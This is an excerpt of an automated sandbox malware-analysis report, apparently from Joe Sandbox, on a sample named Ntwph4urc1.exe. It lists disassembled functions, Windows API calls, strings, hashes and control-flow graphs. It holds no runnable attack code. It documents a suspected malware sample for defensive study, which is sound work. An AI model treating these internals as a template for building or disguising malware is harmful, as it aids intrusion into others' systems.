                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              • Opcode ID: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                              • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                              • Opcode Fuzzy Hash: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                              • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                              Function 004059D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                              • CloseHandle.KERNEL32(?), ref: 00405A0D
                                              Strings
                                              • Error launching installer, xrefs: 004059EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                              • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                              • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                              • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                              Function 00403A28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                              • GlobalFree.KERNEL32(0095E768), ref: 00403A49
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-3936084776
                                              • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                              • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                              • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                              • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                              Function 00405D0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-3125694417
                                              • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                              • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                              • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                              • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                              Function 73F510E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 73F5116A
                                              • GlobalFree.KERNEL32(00000000), ref: 73F511C7
                                              • GlobalFree.KERNEL32(00000000), ref: 73F511D9
                                              • GlobalFree.KERNEL32(?), ref: 73F51203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 03b79746cb6d172eb0e6591e44f1e44e07a2cbd02f1259447ddae6d781709e40
                                              • Instruction ID: 340afd706da99636f0152b008fe8e64213845de668c722b5fc8b8595bfd7e55d
                                              • Opcode Fuzzy Hash: 03b79746cb6d172eb0e6591e44f1e44e07a2cbd02f1259447ddae6d781709e40
                                              • Instruction Fuzzy Hash: 2D3172B3500A07DFEB10AF66C955B2A77FCEB452D0B24055AF94BD7264EB74F8018BA0
                                              Function 00405E49 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                              • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                              • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                              • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                              • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                              Execution Graph

                                              Execution Coverage:0%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:1
                                              Total number of Limit Nodes:0
                                              execution_graph 82326 36982df0 LdrInitializeThunk

                                              Executed Functions

                                              Function 369835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1 369835c0-369835cc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 65e7efe6923f5804c3569f0ba20b623d59f2066d3de550f7d03a81186cb816f8
                                              • Instruction ID: cea8cb3bc3762861537b95b5e97ebbf8ee2570ac2fae5c7c8762dfe4a32d976a
                                              • Opcode Fuzzy Hash: 65e7efe6923f5804c3569f0ba20b623d59f2066d3de550f7d03a81186cb816f8
                                              • Instruction Fuzzy Hash: 2B90023160660402D10071584618746104947D0211F65C856A143852CD879A8A5565A6
                                              Function 36982DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 36982df0-36982dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 32c55447e13f5a7b2e78a6132f51aecbe88d3d5d74333c27caeec1bb2b3d3235
                                              • Instruction ID: ee29b8d0d016fe53856e3d9bce1408b3e2826eca4d4a3787b148a4a37b29f40d
                                              • Opcode Fuzzy Hash: 32c55447e13f5a7b2e78a6132f51aecbe88d3d5d74333c27caeec1bb2b3d3235
                                              • Instruction Fuzzy Hash: BD90023120250413D11171584608747004D47D0251F95C857A143851CD965B8A56A125

                                              Non-executed Functions

                                              Function 369E94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 553 369e94e0-369e9529 554 369e952b-369e9530 553->554 555 369e9578-369e9587 553->555 556 369e9534-369e953a 554->556 555->556 557 369e9589-369e958e 555->557 558 369e9695-369e96bd call 36989020 556->558 559 369e9540-369e9564 call 36989020 556->559 560 369e9d13-369e9d27 call 36984c30 557->560 569 369e96bf-369e96da call 369e9d2a 558->569 570 369e96dc-369e9712 558->570 567 369e9566-369e9573 call 36a0972b 559->567 568 369e9593-369e9634 GetPEB call 369edc65 559->568 579 369e967d-369e9690 RtlDebugPrintTimes 567->579 580 369e9636-369e9644 568->580 581 369e9652-369e9667 568->581 574 369e9714-369e9716 569->574 570->574 574->560 578 369e971c-369e9731 RtlDebugPrintTimes 574->578 578->560 587 369e9737-369e973e 578->587 579->560 580->581 582 369e9646-369e964b 580->582 581->579 583 369e9669-369e966e 581->583 582->581 585 369e9673-369e9676 583->585 586 369e9670 583->586 585->579 586->585 587->560 589 369e9744-369e975f 587->589 590 369e9763-369e9774 call 369ea808 589->590 593 369e977a-369e977c 590->593 594 369e9d11 590->594 593->560 595 369e9782-369e9789 593->595 594->560 596 369e978f-369e9794 595->596 597 369e98fc-369e9902 595->597 600 369e97bc 596->600 601 369e9796-369e979c 596->601 598 369e9a9c-369e9aa2 597->598 599 369e9908-369e9937 call 36989020 597->599 603 369e9af4-369e9af9 598->603 604 369e9aa4-369e9aad 598->604 614 369e9939-369e9944 599->614 615 369e9970-369e9985 599->615 606 369e97c0-369e9811 call 36989020 RtlDebugPrintTimes 600->606 601->600 605 369e979e-369e97b2 601->605 609 369e9aff-369e9b07 603->609 610 369e9ba8-369e9bb1 603->610 604->590 608 369e9ab3-369e9aef call 36989020 604->608 611 369e97b8-369e97ba 605->611 612 369e97b4-369e97b6 605->612 606->560 639 369e9817-369e981b 606->639 633 369e9ce9 608->633 618 369e9b09-369e9b0d 609->618 619 369e9b13-369e9b3d call 369e8513 609->619 610->590 616 369e9bb7-369e9bba 610->616 611->606 612->606 621 369e994f-369e996e 614->621 622 369e9946-369e994d 614->622 626 369e9987-369e9989 615->626 627 369e9991-369e9998 615->627 623 369e9c7d-369e9cb4 call 36989020 616->623 624 369e9bc0-369e9c0a 616->624 618->610 618->619 645 369e9d08-369e9d0c 619->645 646 369e9b43-369e9b9e call 36989020 RtlDebugPrintTimes 619->646 632 369e99d9-369e99f6 RtlDebugPrintTimes 621->632 622->621 657 369e9cbb-369e9cc2 623->657 658 369e9cb6 623->658 630 369e9c0c 624->630 631 369e9c11-369e9c1e 624->631 634 369e998f 626->634 635 369e998b-369e998d 626->635 636 369e99bd-369e99bf 627->636 630->631 642 369e9c2a-369e9c2d 631->642 643 369e9c20-369e9c23 631->643 632->560 665 369e99fc-369e9a1f call 36989020 632->665 644 369e9ced 633->644 634->627 635->627 640 369e999a-369e99a4 636->640 641 369e99c1-369e99d7 636->641 648 369e981d-369e9825 639->648 649 369e986b-369e9880 639->649 654 369e99ad 640->654 655 369e99a6 640->655 641->632 652 369e9c2f-369e9c32 642->652 653 369e9c39-369e9c7b 642->653 643->642 651 369e9cf1-369e9d06 RtlDebugPrintTimes 644->651 645->590 646->560 682 369e9ba4 646->682 662 369e9827-369e9850 call 369e8513 648->662 663 369e9852-369e9869 648->663 664 369e9886-369e9894 649->664 651->560 651->645 652->653 653->651 659 369e99af-369e99b1 654->659 655->641 666 369e99a8-369e99ab 655->666 660 369e9ccd 657->660 661 369e9cc4-369e9ccb 657->661 658->657 668 369e99bb 659->668 669 369e99b3-369e99b5 659->669 670 369e9cd1-369e9cd7 660->670 661->670 672 369e9898-369e98ef call 36989020 RtlDebugPrintTimes 662->672 663->664 664->672 685 369e9a3d-369e9a58 665->685 686 369e9a21-369e9a3b 665->686 666->659 668->636 669->668 676 369e99b7-369e99b9 669->676 677 369e9cde-369e9ce4 670->677 678 369e9cd9-369e9cdc 670->678 672->560 690 369e98f5-369e98f7 672->690 676->636 677->644 683 369e9ce6 677->683 678->633 682->610 683->633 687 369e9a5d-369e9a8b RtlDebugPrintTimes 685->687 686->687 687->560 691 369e9a91-369e9a97 687->691 690->645 691->616
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $ $0
                                              • API String ID: 3446177414-3352262554
                                              • Opcode ID: 85bf7eb3cfd37834cd18fbb1fc12fc84165b70c7d476595a881bc5317507fbad
                                              • Instruction ID: ab529b6c3c726e614ec31f16a1bf886a1f164fb6cd02587d79b46a0fe86b8e6e
                                              • Opcode Fuzzy Hash: 85bf7eb3cfd37834cd18fbb1fc12fc84165b70c7d476595a881bc5317507fbad
                                              • Instruction Fuzzy Hash: 783224B5A083818FE311CF69C884B5BBBE9BB88348F10492EF9D987250D775D949CB52
                                              Function 369F0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1296 369f0274-369f0296 call 36997e54 1299 369f0298-369f02b0 RtlDebugPrintTimes 1296->1299 1300 369f02b5-369f02cd call 369376b2 1296->1300 1304 369f0751-369f0760 1299->1304 1305 369f06f7 1300->1305 1306 369f02d3-369f02e9 1300->1306 1309 369f06fa-369f074e call 369f0766 1305->1309 1307 369f02eb-369f02ee 1306->1307 1308 369f02f0-369f02f2 1306->1308 1310 369f02f3-369f030a 1307->1310 1308->1310 1309->1304 1312 369f06b1-369f06ba GetPEB 1310->1312 1313 369f0310-369f0313 1310->1313 1317 369f06bc-369f06d7 GetPEB call 3693b970 1312->1317 1318 369f06d9-369f06de call 3693b970 1312->1318 1313->1312 1315 369f0319-369f0322 1313->1315 1320 369f033e-369f0351 call 369f0cb5 1315->1320 1321 369f0324-369f033b call 3694ffb0 1315->1321 1323 369f06e3-369f06f4 call 3693b970 1317->1323 1318->1323 1331 369f035c-369f0370 call 3693758f 1320->1331 1332 369f0353-369f035a 1320->1332 1321->1320 1323->1305 1335 369f0376-369f0382 GetPEB 1331->1335 1336 369f05a2-369f05a7 1331->1336 1332->1331 1337 369f0384-369f0387 1335->1337 1338 369f03f0-369f03fb 1335->1338 1336->1309 1339 369f05ad-369f05b9 GetPEB 1336->1339 1340 369f0389-369f03a4 GetPEB call 3693b970 1337->1340 1341 369f03a6-369f03ab call 3693b970 1337->1341 1344 369f04e8-369f04fa call 369527f0 1338->1344 1345 369f0401-369f0408 1338->1345 1342 369f05bb-369f05be 1339->1342 1343 369f0627-369f0632 1339->1343 1356 369f03b0-369f03d1 call 3693b970 GetPEB 1340->1356 1341->1356 1347 369f05dd-369f05e2 call 3693b970 1342->1347 1348 369f05c0-369f05db GetPEB call 3693b970 1342->1348 1343->1309 1352 369f0638-369f0643 1343->1352 1367 369f0590-369f059d call 369f11a4 call 369f0cb5 1344->1367 1368 369f0500-369f0507 1344->1368 1345->1344 1351 369f040e-369f0417 1345->1351 1366 369f05e7-369f05fb call 3693b970 1347->1366 1348->1366 1359 369f0419-369f0429 1351->1359 1360 369f0438-369f043c 1351->1360 1352->1309 1353 369f0649-369f0654 1352->1353 1353->1309 1361 369f065a-369f0663 GetPEB 1353->1361 1356->1344 1386 369f03d7-369f03eb 1356->1386 1359->1360 1369 369f042b-369f0435 call 369fdac6 1359->1369 1362 369f044e-369f0454 1360->1362 1363 369f043e-369f044c call 36973bc9 1360->1363 1370 369f0665-369f0680 GetPEB call 3693b970 1361->1370 1371 369f0682-369f0687 call 3693b970 1361->1371 1373 369f0457-369f0460 1362->1373 1363->1373 1398 369f05fe-369f0608 GetPEB 1366->1398 1367->1336 1376 369f0509-369f0510 1368->1376 1377 369f0512-369f051a 1368->1377 1369->1360 1395 369f068c-369f06ac call 369e86ba call 3693b970 1370->1395 1371->1395 1384 369f0472-369f0475 1373->1384 1385 369f0462-369f0470 1373->1385 1376->1377 1388 369f051c-369f052c 1377->1388 1389 369f0538-369f053c 1377->1389 1396 369f0477-369f047e 1384->1396 1397 369f04e5 1384->1397 1385->1384 1386->1344 1388->1389 1399 369f052e-369f0533 call 369fdac6 1388->1399 1392 369f053e-369f0551 call 36973bc9 1389->1392 1393 369f056c-369f0572 1389->1393 1410 369f0563 1392->1410 1411 369f0553-369f0561 call 3696fe99 1392->1411 1404 369f0575-369f057c 1393->1404 1395->1398 1396->1397 1403 369f0480-369f048b 1396->1403 1397->1344 1398->1309 1405 369f060e-369f0622 1398->1405 1399->1389 1403->1397 1408 369f048d-369f0496 GetPEB 1403->1408 1404->1367 1409 369f057e-369f058e 1404->1409 1405->1309 1413 369f0498-369f04b3 GetPEB call 3693b970 1408->1413 1414 369f04b5-369f04ba call 3693b970 1408->1414 1409->1367 1417 369f0566-369f056a 1410->1417 1411->1417 1420 369f04bf-369f04dd call 369e86ba call 3693b970 1413->1420 1414->1420 1417->1404 1420->1397
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 3446177414-1700792311
                                              • Opcode ID: ac18207bdd3698466fd6f4bdcbb4d71ab85c01a74a0cee17154aae8c6565158b
                                              • Instruction ID: c1ad7982f6efb8584a14ddea6cd0e595be54ec9fa4660c76795eb83a0357ee31
                                              • Opcode Fuzzy Hash: ac18207bdd3698466fd6f4bdcbb4d71ab85c01a74a0cee17154aae8c6565158b
                                              • Instruction Fuzzy Hash: 5BD10E75920784DFDB12CF69C820AAABBFAFF59315F278049E4449F212D736D882CB51
                                              Function 369EF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
